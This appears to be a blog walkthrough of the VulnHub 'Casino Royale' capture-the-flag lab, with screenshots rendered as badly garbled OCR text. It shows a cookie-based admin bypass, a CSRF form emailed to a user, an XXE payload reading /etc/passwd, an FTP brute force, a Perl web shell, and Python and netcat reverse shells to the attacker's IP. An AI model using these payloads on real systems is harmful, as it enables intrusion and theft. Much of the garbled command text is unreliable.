Casino Royale CTF Walkthrough

Another James Bond themed CTF challenge from https://www.vulnhub.com/.

Spoilers ahead!

Scanning & Enumeration

Let’s start with a port scan of the target system:

starting "map 7.70 ( https://nmap.org ) at 2019-03-02 EST 
Nmap scan report for casino- royale. locat (192.168.0.109) 
Host is up (0.00ß74s latency) 
Not shown: 996 closed ports 
PORT 
25/tcp 
STATE SERVICE VERSION 
open ftp 
vsftpd 2.0.8 or later 
Postfix smtpd 
open smtp 
I _smtp- commands: casino. local domain, PIPELINING, 
I SSI •cert: Subject: commonName—casino 
I subject Alternative Name: DNS: casino 
I Not valid before: 
l_Not valid after: 
SIZE 10240eeø, 
VRFY, 
ETRN, 
STARTTLS , 
ENHANCEDSTATUSCODES , 
8BITMIME , 
DSN , 
SMTPUTF8 , 
I _ SSI-date: TLS randomness does not represent time 
86/ tcp 
open http 
Apache httpd 2.4.25 ( (Debian)) 
I http- robots. txt: 2 disallowed entries 
l_/cards /kboard 
l_http-server-header: Apache/2.4.25 (Debian) 
I http-title: Site doesn't have a title (text/html). 
8681/tcp open http 
PHP cli server 5.5 or later 
l_http-title: Site doesn't have a title (text/html; charset=UTF-8). 
MAC Address: (vmware) 
Device type: general purpose 
Running: Linux 3. X14.X 
OS CPE: kernel:3 cpe:/o: linux: 
OS details: Linux 3.2 
Network Distance: 1 hop

Nikto highlights some interesting directories to check out:

nikto - 
- Nikto v2.1.6 
• Target IP: 
* Target Hostname: 
Target port: 
Start Time: 
h 192.168.0.109 
192.168.e 109 
192. 168.0.109 
2019-03-62 10:18:23 (GMT-5) 
• Server: Apache/2.4.25 (Debian) 
* Server leaks inodes via E Tags, header found With file / , fields: Oxdc Ox58272762faf27 
+ The anti-clickjacking X-Frame-Options header is not present. 
The x-xSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content Of the site in a different fashion to the MI 
ME type 
* Entry ' (cards/' in robots. txt returned a non- forbidden or redirect HTTP code (200) 
+ Entry ' in robots . txt returned a non-forbidden or redirect HTTP code (200) 
"robots . txt" contains 2 entries which should be manually viewed. 
+ Multiple index files found: / index. html, / index.php 
Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
/kboard/: KBoard Forum 0.3.0 and prior have a security problem in 
forum_post.php and forum_reply .php 
+ OSVDB•3092: 'cards/ : This might be interesting. 
OSVDB-3e92: 'includes': This might be interesting... 
+ OSVDB-3092: / install': This might be interesting... 
• Uncommon header found, with contents: 
* Uncommon header 'x-robots- tag' found, With contents: noindex, nofOIIOW 
+ Uncommon header 'x-ob mode' found, with contents: I 
OsvoB-3233: ,'icons/README: Apache default file found. 
/phpmyadmin/: phpMyAdmin directory found 
• 8348 requests: O error(s) and 18 item(s) reported on remote host 
none 
* End Time: 
2019-03-02 (6MT-5) (29 seconds)

The /install directory shows PokerMax Pro Poker software (v0.13) is installed. From a quick Google, an exploit is available (https://www.exploit-db.com/exploits/6766), allowing you to login as an administrator account by adding a cookie.

PokerMax Pro Poker Leagc€ X + 
@ 192.168.0.109 
'install/ 
Most Visited Getting Started (GIF Image, 500 *200 (GIF Image, 600 x 269 @ PokerMaxPro Poker Le.„ phpMyAdmin 
PokerMax poker League 
01 March 2019 
PokerMax Poker League Installation 
DATABASE TABLE INSTALLATION 
Please enswe you have created the database and edited the config. php file with the correct database 
information before attempting to install 
You are abcut to install PokerMax Pro Poker Software 
version vo.13 
at 
Click to Start Installation 
444

I used BurpSuite to add the cookie when making the request:

H VIP history WebSockets history 
Request to http://192.168.o.109:go 
Options 
Forward 
Drop 
Headers Hex 
GET 'pokeradmin/confiqure.php HTTP/I.I 
Host; 192. 
user-Agent: MoziLla/5.o (Xll; Linux xg6_6a; rv:60.o) Gecko/20100101 Firefox/60.o 
Accept: 
Accept Encoding: gzip, deflate 
Connection: close 
upgrade-Insecure -Requests: I 
Cookie: ValidUserAdmin=admin

I was then redirected to the administrator panel without authentication 🙂

- Mozilla Firefox 
PokerMax Poker League : 
PokerMax Poker League The Poker League Solution 
x PokerMax Poker League x + 
@ 192.168.o.109/pokeradrnin\configure.php 
MostVisited Getting Started (GIF Image, 500 *200 @ (GIF Image, 600 *269 @ PokerMaxPro Poker Le„. z' phpMyAdmin PokerMaxPoker Leagu,., 
PokerMax poker League 
pokerMaX poker 
Home 
League Settings 
Clear League Data 
Create Poker Tournament 
Manage Poker Tournament 
Add / Update Scores 
Assign Players to 
Add New p I ayers 
p laye-s 
print Results 
01 March 2019 
PokerMax Poker League Configure Settings 
you want to change the username password w"icn you use to login to this control panel, enter the new details in the belt'" and click Lqxlate button. You may 
asked to back in, it yckj Lqxlate these detaile Make sure the correct have entered 'or the contact and league inrorrnation 
Username admin 
Password raise12million 
PNer League Name Casino Royale 
League Elite High-stakes Texas em located at the 
Casino please use our 
when accessing this Site: 
Local •q 
Contact,'Toumament Director Le 
Contact Email NA 
Back Database

Once logged in, I could see listings of existing players:

PokerMax Poker League z: Manage Poker Players 
Player Name 
Felix Leitet 
James gond 
Tomelli 
Player Nictwne 
Completed found. 
Date Added 
17 November 2018 
17 Novemtpr 201S 
17 r.bvember 2018 
17 November 201B 
17 Novemtpr 2018 
17 November 2018 
17 Novemtpr 201S 
Edit Info 
Edit Info 
Edit Info 
Edit Info 
Edit Info 
Edit Info 
Edit Info

One user profile stood out, due to them having an email address attached:

pokerMax poker League Update Player Information 
• Are Required FjeJds and need to titled in. 
• Player Name 
• Nic r Larne 
Em AdtÉe•SS 
Valenka 
Valenka 
valenka 
projects on: 
p layet p 
are local Update 
your hosts file! 
Update Details 
Delete Player (confirm in next step)

Cross Site Request Forgery Exploitation

As per the instructions in the user profile, I added in a hosts file entry for casino-royale.local to point to the VulnHub system, and go to the /vip-client-portolios directory. This shows a SnowFox CMS:

Snowfox CMS 
About 
Blog 
My Account • 
Sorted By: 
US English 
Publish Time (Latest to Oldes 
21 
Casino Royale Event! 
We invite our byal customers to participate in a luxurious event at the Casino Royale in Montenegro! The name of the game is Texas Hold'emand it's high stakes. Bring all and bet 
the farm! 
High-Tech Gadgets 
wry specific hard to find gadgets - thars what we have! A niche market we surpass all of our competitors n.

One post relates to contacting the CMS admin. From another Google, the SnowFox CMS application is vulnerable to Cross Site Request Forgery (https://www.exploit-db.com/exploits/35301).

New Clients - Please Read 
If you've been referred and are interested in our •assistance", please send us an email, 
Send an email to our CMS admin: valenka@casino-royale./ocaj 
Make sure to reference a known custonEr or at least someone we know in the subject line, otherwise the email be deleted without being Boked at. 
Valenka checks her email often as well as manages this site. 
Include any links to relevant information such as references, services, referrals, etc. 
Site is LIVE! Welcome! 
Big thanks to the IT folks for making this! Deadlines where tight and the complaints about •secure code review' were plentiful, but with the help of upper management',ve pushed through 
Total Records: 6 | Total Pages: 1 | | 10 
Records per Page

Time to craft the CSRF exploit;

cat exploit. html 
<form action=•http://casino-royale.local/vip-client-portfolios/?url=admln/accounts/create" 
<input 
einput 
<input 
einput 
s:input 
<input 
einput 
•:input 
einput 
<input 
einput 
c/bodp 
e/html> 
hidden" 
type " 
type "hidden" 
type " 
hidden" 
type 
•verifiedEmail" 
name: 
username" value=" page" 
name— • 
-newPassword" 
name— 
confirmpassword" / > 
name: • 
—"user Groups [l" value:" 33" 
name— 
memo • 
name= 
•status" 
name= 
formAction" value" submit" 
name: 
form"

Then send an email to the target account to persuade them to click:

telnet 192.168.0.109 25 
Trying 192.168.0. 
connected to 192. 168.0. 169. 
Escape character is 
220 Mait Server • 
NO UNAUTHORIZED ACCESS ALLOWED Pts. 
EHLO test 
-casino. I domain 
250 
250-PIPELINING 
250-SIZE 1ß24eeøo 
250 
250-ETRN 
250-STARTTLS 
250-ENHANCEDSTATUSCODES 
250-881 TMIME 
250 
SMTPUTF8 
MAIL FROM: james@bond.com 
250 2.1.e 0k 
RCPT TO: valenka 
250 2.1.5 0k 
data 
354 End data with 
subject: telix 
http://192.168.ø. html 
kthxbai 
250 2.0.O ok: 
queued as 
F268625C6

With our new admin account enabled, I could now login to the CMS as an admin. Whilst reviewing the user profiles, I noticed another web address in the “le” profile:

snowfox CMS 
About • 
Username 
password 
Blog 
My Account • 
Admin • 
us I 
Confirm password 
user Groups 
Logins 
Last Login p 
Last Login Time 
user Language 
Memo 
Administrators 
Al Users 
o 
No Data 
US English 
I primarity deal with the numbers, along with our most 
Elite customers with access to lultra•access• 
view/main.php

XML External Entity Injection

Looking at the source code of this URL suggested that it might be vulnerable to XXE:

chl Access: 
! - -FYI this is taking POST requests without a frmt end for the time being.. 
Try using curl to POST Xml ccmnands or script files herE! 
PHP code below... 
(false); 
"'I file — ) : 
Sdom — new Damocument(); 
L rexML NOEh'7 1 L rexML„DTDLOAD); 
Screds — simplexml importdom($dom): 
"ser - $creds-scustomer; 
"ass - $creds-spass»ord; 
echo 
Wel come 
•welcome $user ! 
•also pts update the password for the custom ftp acct once the front end is finished.. since it's easy 
c/ html*

I put together an XXE exploit using BurpSuite, which revealed the “customer” parameter was vulnerable:

Request 
params Headers Hex XML 
GET / ultra-access-vaew/main.php HTTP/I.I 
Host: casino- royale.local 
User -Agent: Mozilla/5.O (XII; Linux x86_64; :60.01 Gecko/20100101 
Firefox/60.o 
Accept: text/html , .8 
Accept -Language: , .5 
Accept-encoding: gzip, deflate 
Cookie: .7cbfb068e8f80e7ffOc7ab32bc88fa23; 
sfc .a216723621461d4c1cbf576 
b4gg717ef 
Connection: 
Upgrade• Insecure-Requests: I 
Cache-control; max -age:O 
content-Length: 2021 
encoding:" 
foo [ foo ANY 
SYSTEM •file:///etc/passwd" 
ecredss 
<cus tome O customer> 
Target: 
Response 
Headers Hex HTML Render 
Dispatcher, ; /var/run/speech•dispatcher; 'bin/ false 
Display 
pulse: x: 110: 114: pulseAudio daemon : 
/var/run/putse:/bin/false 
:Avahi "DNS daemon . 
• 'bin/ false 
saned : x : 112: 118 : : /bin/false 
server, , , 
valenka 
: /bin/bash 
postfix 114: 121 : : /var/spool/postfix : /bin/false 
ftp:x:IIS:124:ftp daemon, , , 
</bodp 
c! - -al 50 p15 update the password for the ftp acct once the front 
end is finished. -since it's easy

Brute Force Time!

Since the HTML comments in the previous webpage suggested the FTP user had a weak password, and we now know the username from the /etc/passwd file (ftpUserULTRA) this looked like a good brute force candidate.

ACCOUNT 
ACCOUNT 
ACCOUNT 
ACCOUNT 
ACCOUNT 
CHECK: 
CHECK: 
FOUND: 
CHECK: 
CHECK: 
[ftp] 
[ftp] 
[ftp] 
[ftp] 
(ftp] 
Host: 
Host : 
Host: 
Host: 
Host: 
192. 168.0.109 
192. 
192. 168.0.109 
192. 168.0. 109 
109 
(1 of 
(I of 
User: 
(1 of 
of 
1, o complete) user: ftpUserULTRA (1 of 1, e complete) 
I, e complete) User: ftpUserULTRA (I of I, e complete) 
ttpUserULTRA Password: bankbank [SUCCESSI 
1, o complete) user: ftpUserULTRA (1 of 1, 1 complete) 
O complete) User: ftpUserULTRA of I. 
I complete) 
Password: 
password: 
Password: 
Password: 
sqIsqIsqIsqI (50 Of 221 complete) 
bankbank (51 of 221 complete) 
networking (52 of 221 complete) 
testinq (53 of 221 complete)

Credentials: ftpUserULTRA/bankbank

I connected to the FTP server using the credentials gained through brute force. Looking in the FTP directory, there were files which were also accessible from the webserver, such as hello_world.pl:

http://casino-royale.local/ultra-access-view/hello_world.pl

dud “ идеш 
х. их.јхмј. 
х- ах -.јхд.ј 
доојеаидед 
зоарзл 
та:€т 
х- лх-јхдјр 
sale1dwaI 
Iz:61 
х-их-јхдјр 
It:€I 
saunl)Jd 
Iz:61 
х- 4х-јхд.јр 
) vsnA 
It:61 
х • лк. јхдјр 
speo итоо 
х - ах-јхдзр 
диашпэоо 
It:61 
х-их-јхдјр 
d0iHsa0 
ТЕ:бТ 
х - И к- јхдјр 
qag 
IEII 
I6I 
96ее 
96av 
960е 
96ev 
96ее 
96ev 
96ev 
960е 
гввт 
аввт 
еввт 
аввт 
аввт 
гввт 
говт 
zeBI 
еевт 
аевт 
говт 
• 6unsv1 Азојэајур ап 5ашоэ 
азэн esI

This made it fairly obvious the aim was to upload a shell. Since existing Perl code was in place, that looked like the best option.

I uploaded /usr/share/webshells/perl/perlcmd.cgi, and used that to execute a reverse netcat shell:

nc -Ivp 1234 
listening on (any] 1234 
uidz33(wm•'• data) 
Mozilla Firefox 
• casino.royale.local/ultrc x + 
Executing: which netcat 
fbinfnetcat

Privilege Escalation

After poking around for a bit, I could see some interesting files in the /opt/casino-royale directory.

total 48 
d rwxrvx r •x 
drwxr-xr-x 4 
-rw-r--r- 
-rwsr-sr-x 
- rwxrwx r - x 
-rwxr-x-- 
- rwxrwxr - 
2 root 
root 
root 
1 root 
root 
: / - royale$ 
19: 03 
18:17 
19:02 
14:26 
15:30 
root 
- data 
root 
root 
root 
4096 
4096 
46 
79 
174 
8696 
54 
402 
71 
Feb 
Jan 
Feb 
Feb 
Feb 
Feb 
Feb 
Feb 
Feb 
Feb 
22 
17 
20 
22 
20 
21 
20 
20 
20 
20 
15. 
• 22 
14. 
•54 
21. 
•48 
16. 
•56 
15 
•.21 
casino- data- cot lection. py 
closer2root. txt 
cot lect . php 
index. html 
m16 detect test 
php-web-start. sh 
run. sh 
user -data. log

The file casino-data-collection.py was owned by “le” but writable by my current user group (www-data).

I appended a reverse shell into the data collection file:

www-data@casino:/opt/casino-royale$ echo "import socket, subprocess , os .AF_INET, socket. SOCK_STREAY) ; s. 192.168.0. Il I 
' ,4444)) ,O); os.dup2(s. , ' •i' > casino-data-cottection.py 
• ' -i' casino-data-collection.py 
www-data@casino:/opt/casino• royale$ python casino-data-collection.py 
python casino-data-collection. py

By calling the file in the webroot, I got another reverse shell as the “le” user:

C:\Users\user.BORDERGATE\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image020.png

As per the previous directory listing, “le” was able to write to run.sh, which in turn was invoked from ./mi6_detect_test. The file already contained shell commands, so I added in /bin/sh. This provided a root shell.

C:\Users\user.BORDERGATE\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image021.png

Looking in the /root/flag directory, a flag script was found. Executing this started another web server …

C:\Users\user.BORDERGATE\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\TempState\msohtmlclip\clip_image022.png